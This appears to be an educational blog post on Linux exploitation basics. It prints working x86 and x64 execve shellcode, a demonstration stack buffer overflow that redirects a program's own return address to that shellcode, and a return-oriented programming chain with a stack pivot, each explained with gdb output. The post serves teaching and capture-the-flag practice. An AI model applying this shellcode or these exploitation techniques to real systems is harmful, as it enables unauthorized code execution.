Shellcode, Buffer Overflow and Return Oriented Programming



In this post, I give a brief introduction to shellcode, stack buffer overflows and return-oriented programming (ROP).


Usually, shellcode refers to a short sequence of machine code that spawns a shell for the attacker. Below are execve shellcodes for X86 and X64 Linux systems respectively [1][2].

//gcc -fno-stack-protector -z execstack shellx86.c -o shellx86  -no-pie -m32

unsigned char code[] = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main()
{
	int (*ret)() = (int(*)())code;
	ret();	/* treat the byte array as a function and jump into it */
	return 0;
}

//gcc -fno-stack-protector -z execstack shellx64.c -o shellx64  -no-pie

unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
int main()
{
	int (*ret)()=(int(*)()) code;
	ret();	/* treat the byte array as a function and jump into it */
	return 0;
}

To show how these two shellcodes work, we disassemble each one and inspect the registers just before the system call.
For shellcode on X86 platform:

0x804a018 <code>:	xor    %eax,%eax
0x804a01a <code>:	cltd   
0x804a01b <code>:	push   %eax
0x804a01c <code>:	push   $0x68732f2f
0x804a021 <code>:	push   $0x6e69622f
0x804a026 <code>:	mov    %esp,%ebx
0x804a028 <code>:	push   %eax
0x804a029 <code>:	push   %ebx
0x804a02a <code>:	mov    %esp,%ecx
0x804a02c <code>:	mov    $0xb,%al
0x804a02e <code>:	int    $0x80

Breakpoint 2, 0x0804a02e in code ()
(gdb) p/x $eax
$1 = 0xb
(gdb) p/x $ebx
$2 = 0xffffd2d0
(gdb) x/s $ebx
0xffffd2d0:	"/bin//sh"
(gdb) p/x $ecx
$3 = 0xffffd2c8
(gdb) x/4wx $ecx
0xffffd2c8:	0xffffd2d0	0x00000000	0x6e69622f	0x68732f2f
(gdb) p/x $edx
$4 = 0x0

At 0x804a02e, just before the int $0x80 system call, $eax holds the syscall number for execve (0xb), $ebx holds the address of the string “/bin//sh”, $ecx holds the address of the argv array (a pointer to the path followed by a NULL terminator), and $edx (envp) is 0.
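The two push instructions with immediates build the path string on the stack four bytes at a time. Because x86 is little-endian, the low byte of each immediate lands at the lowest address, and the value pushed last sits first in memory. Here is a minimal sketch of that byte layout in plain C. The helper name pack_path is hypothetical and only illustrates the encoding; it is not part of the shellcode.

```c
#include <stdint.h>

/* Hypothetical helper: reproduce in a buffer what the three pushes
 * (push %eax; push $0x68732f2f; push $0x6e69622f) leave on the stack.
 * out must have room for 12 bytes. */
static void pack_path(unsigned char out[12])
{
	/* The value pushed last ends up at the lowest address. */
	const uint32_t words[3] = { 0x6e69622f, 0x68732f2f, 0x00000000 };

	for (int i = 0; i < 3; i++) {
		for (int b = 0; b < 4; b++) {
			/* little-endian: least significant byte first */
			out[4 * i + b] = (unsigned char)(words[i] >> (8 * b));
		}
	}
}
```

Reading the buffer back as a C string gives "/bin//sh", which matches the x/s $ebx output above. The doubled slash pads the path to exactly eight bytes, so no NUL byte has to appear inside the shellcode itself.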

For shellcode on X64 platform:

0x601030 <code>:	mul    %esi
0x601032 <code>:	push   %rdx
0x601033 <code>:	movabs $0x68732f2f6e69622f,%rbx
0x60103d <code>:	push   %rbx
0x60103e <code>:	lea    (%rsp),%rdi
0x601042 <code>:	mov    $0x3b,%al
0x601044 <code>:	syscall 

Breakpoint 2, 0x0000000000601044 in code ()
(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x7fffffffe148
(gdb) x/s $rdi
0x7fffffffe148:	"/bin//sh"
(gdb) p/x $rsi
$3 = 0x7fffffffe258
(gdb) x/2gx $rsi
0x7fffffffe258:	0x00007fffffffe53f	0x0000000000000000
(gdb) p/x $rdx
$4 = 0x0

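At 0x601044, just before the syscall instruction, $rax holds the syscall number for execve (0x3b), $rdi holds the address of “/bin//sh”, $rsi holds the argv pointer and $rdx (envp) is 0. The shellcode never sets $rsi itself; the value seen here appears to be left over from main's own argv. Likewise, mul %esi clears $rax and $rdx in a single instruction only if $eax is already 0 when the shellcode starts.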
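The register assignments above map one-to-one onto the arguments of execve. As a rough C-level sketch of the same call, the hypothetical helper run_execve below issues the syscall through glibc's syscall() wrapper inside a child process, so the calling program survives. It assumes Linux and glibc, and it is an illustration, not what the shellcode author wrote.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run execve(path, argv, NULL) in a child process via
 * the raw syscall interface. Returns the child's exit status, or -1. */
static int run_execve(const char *path, char *const argv[])
{
	pid_t pid = fork();
	if (pid < 0)
		return -1;
	if (pid == 0) {
		/* rax = SYS_execve (0x3b on x86-64), rdi = path,
		 * rsi = argv, rdx = envp (NULL here, as in the shellcode) */
		syscall(SYS_execve, path, argv, (char *const *)NULL);
		_exit(127);	/* only reached if execve failed */
	}

	int status;
	if (waitpid(pid, &status, 0) < 0)
		return -1;
	return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For example, calling run_execve("/bin/sh", args) with args set to { "sh", "-c", "exit 7", NULL } should return 7 on a system where /bin/sh exists.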

Stack buffer overflow

A stack buffer overflow is typically used to overwrite the return address saved on the stack.

//gcc bof.c -o bof -no-pie -z execstack
//(add -fno-stack-protector if your gcc enables stack canaries by default)

#include <stdio.h>

int main()
{
	unsigned char victim[20];
	unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05";
	printf("executable code at %p\n", (void *)code);
	/* split the address of code[] into bytes, least significant first */
	char c1 = (unsigned long)(code) & 0xff;
	char c2 = ((unsigned long)(code) & 0xff00)>>8;
	char c3 = ((unsigned long)(code) & 0xff0000)>>16;
	char c4 = ((unsigned long)(code) & 0xff000000)>>24;
	char c5 = ((unsigned long)(code) & 0xff00000000)>>32;
	char c6 = ((unsigned long)(code) & 0xff0000000000)>>40;
	/* deliberately writes past victim[]: 40 filler bytes, then the 8-byte address */
	snprintf((char *)victim, 80, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%c%c%c%c", c1, c2, c3, c4, c5, c6, 0, 0 );
	return 0;
}

The sample code above shows how a buffer overflow vulnerability corrupts the return address on the stack and ends up executing the shellcode. Note that the shellcode used here differs slightly from the one in the previous section: it adds xor %rsi,%rsi and xor %rdx,%rdx (bytes 48 31 f6 48 31 d2) so that argv and envp are explicitly NULL.
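The c1 to c6 variables in the sample are simply the little-endian bytes of the target address, appended after enough filler to reach the saved return address. The same payload can be assembled without a format string. The sketch below uses a hypothetical helper, build_payload, and the caller must supply the filler length, since the 40 bytes used above depend on how the compiler lays out the stack frame.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: write pad_len filler bytes followed by the 8-byte
 * little-endian encoding of addr. Returns the number of bytes written,
 * or 0 if out is too small to hold the payload. */
static size_t build_payload(unsigned char *out, size_t out_len,
                            size_t pad_len, uint64_t addr)
{
	if (pad_len > out_len || out_len - pad_len < 8)
		return 0;

	memset(out, 'A', pad_len);
	for (int i = 0; i < 8; i++) {
		/* same shifts as c1..c6, plus the two zero top bytes */
		out[pad_len + i] = (unsigned char)(addr >> (8 * i));
	}
	return pad_len + 8;
}
```

With a made-up address such as 0x7fffffffe120 and 40 bytes of filler, the payload is 48 bytes long and ends in 20 e1 ff ff ff 7f 00 00. Unlike the vulnerable snprintf call, this helper checks the destination size, so it builds the payload without overflowing anything itself.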

Return Oriented Programming

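Return Oriented Programming (ROP) is a code-reuse attack technique: instead of injecting new code, the attacker chains together short instruction sequences (gadgets) that each end in a ret.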

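//gcc rop.c -o rop -no-pie 

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

int main()
{
	int rv;
	unsigned long victim[1];

	unsigned long *gadget = malloc(0x4000);
	printf("gadget address: %p\n", (void *)gadget);
	/* make the first heap page executable; assumes gadget - 0x10 is page-aligned, as in the run shown below */
	rv = mprotect((char *)gadget - 0x10, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
	if(rv < 0)
		perror("mprotect");
	unsigned long base = (unsigned long)gadget;
	/* simulated overflow: out-of-bounds writes reach the saved return address */
	victim[5] = base;          //return address -> pivot gadget
	victim[6] = base + 0x1000; //new rsp, popped by the pivot gadget

	gadget[0] = 0xc35c; //pop rsp; ret
	gadget[1] = 0xc35f; //pop rdi; ret
	gadget[2] = 0xc35e; //pop rsi; ret
	gadget[3] = 0xc35a; //pop rdx; ret
	gadget[4] = 0xc358; //pop rax; ret
	gadget[5] = 0x050f; //syscall

	//fake stack at base + 0x1000
	gadget[0x200] = base + 8;
	gadget[0x201] = base + 0x2000; //rdi
	gadget[0x202] = base + 0x10; 
	gadget[0x203] = 0;        //rsi
	gadget[0x204] = base + 0x18; 
	gadget[0x205] = 0;        //rdx
	gadget[0x206] = base + 0x20; 
	gadget[0x207] = 0x3b;     //rax = execve
	gadget[0x208] = base + 0x28;

	gadget[0x400] = 0x68732f2f6e69622f; //"/bin//sh"

	return 0;
}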

To make the ROP chain above easier to follow, I dump the registers and the memory layout at the moment of the syscall.

(gdb) p/x $rax
$1 = 0x3b
(gdb) p/x $rdi
$2 = 0x604010
(gdb) x/s $rdi
0x604010:	"/bin//sh"
(gdb) p/x $rsi
$3 = 0x0
(gdb) p/x $rdx
$4 = 0x0
(gdb) x/10gx 0x603010
0x603010:	0x0000000000602018	0x0000000000604010
0x603020:	0x0000000000602020	0x0000000000000000
0x603030:	0x0000000000602028	0x0000000000000000
0x603040:	0x0000000000602030	0x000000000000003b
0x603050:	0x0000000000602038	0x0000000000000000
(gdb) x/2i 0x602010
   0x602010:	pop    %rsp
   0x602011:	retq   
(gdb) x/2i 0x602018
   0x602018:	pop    %rdi
   0x602019:	retq   
(gdb) x/2i 0x602020
   0x602020:	pop    %rsi
   0x602021:	retq   
(gdb) x/2i 0x602028
   0x602028:	pop    %rdx
   0x602029:	retq   
(gdb) x/2i 0x602030
   0x602030:	pop    %rax
   0x602031:	retq   
(gdb) x/i 0x602038
=> 0x602038:	syscall

In this sample, the buffer overflow is simplified: the program overwrites its own return address with 0x602010 directly.
The pop rsp; ret gadget acts as a pivot that moves rsp to 0x603010, where a fake stack has been laid out to chain the remaining gadgets.
There are 6 ROP gadgets in total. The gadget at 0x602010 is the pivot that changes rsp. The gadgets at 0x602018, 0x602020, 0x602028 and 0x602030 each load a value into a register (rdi, rsi, rdx and rax respectively). The gadget at 0x602038 triggers the syscall.
In practice, gadgets have to be found in the target binary, and the available ones are rarely as clean and simple as those in this sample.
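To make the chaining concrete, the sketch below rebuilds the fake stack from the dump and walks it the way the CPU would: every ret pops a gadget address, and every pop gadget then consumes the next word. It is a simulation in ordinary C that executes no gadgets. The names build_chain, simulate_chain and struct regs are hypothetical, and it assumes the six gadgets sit 8 bytes apart starting at base, as in the sample.

```c
#include <stdint.h>

/* Gadget slots, 8 bytes apart from base, in the order used by the sample. */
enum { SLOT_PIVOT, SLOT_RDI, SLOT_RSI, SLOT_RDX, SLOT_RAX, SLOT_SYSCALL };

struct regs { uint64_t rdi, rsi, rdx, rax; };

/* Fill chain[0..8] with the values the sample stores at gadget[0x200..0x208]. */
static void build_chain(uint64_t base, uint64_t chain[9])
{
	chain[0] = base + 8 * SLOT_RDI;  chain[1] = base + 0x2000; /* path */
	chain[2] = base + 8 * SLOT_RSI;  chain[3] = 0;             /* argv */
	chain[4] = base + 8 * SLOT_RDX;  chain[5] = 0;             /* envp */
	chain[6] = base + 8 * SLOT_RAX;  chain[7] = 0x3b;          /* execve */
	chain[8] = base + 8 * SLOT_SYSCALL;
}

/* Walk the fake stack. Returns 1 if the walk reaches the syscall gadget,
 * 0 if it runs off the end or hits an address that is not a known gadget. */
static int simulate_chain(uint64_t base, const uint64_t *chain, int len,
                          struct regs *r)
{
	int sp = 0;

	while (sp < len) {
		uint64_t slot = (chain[sp++] - base) / 8;  /* ret: pop gadget address */
		if (slot == SLOT_SYSCALL)
			return 1;
		if (sp >= len)
			return 0;
		uint64_t value = chain[sp++];              /* pop reg: pop operand */
		switch (slot) {
		case SLOT_RDI: r->rdi = value; break;
		case SLOT_RSI: r->rsi = value; break;
		case SLOT_RDX: r->rdx = value; break;
		case SLOT_RAX: r->rax = value; break;
		default:       return 0;
		}
	}
	return 0;
}
```

With base set to 0x602010, build_chain reproduces the x/10gx 0x603010 dump above, and the simulated walk ends with rdi = 0x604010, rsi = 0, rdx = 0 and rax = 0x3b, the same register state gdb reports at the syscall.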


In this post, I gave a simple introduction to shellcode, stack buffer overflows and ROP, and showed how they can be combined to get a shell. Real CTF challenges are not as simple as what is demonstrated here: they may require alphanumeric shellcode, or enable a shadow stack or simple Control Flow Integrity to make exploitation harder.


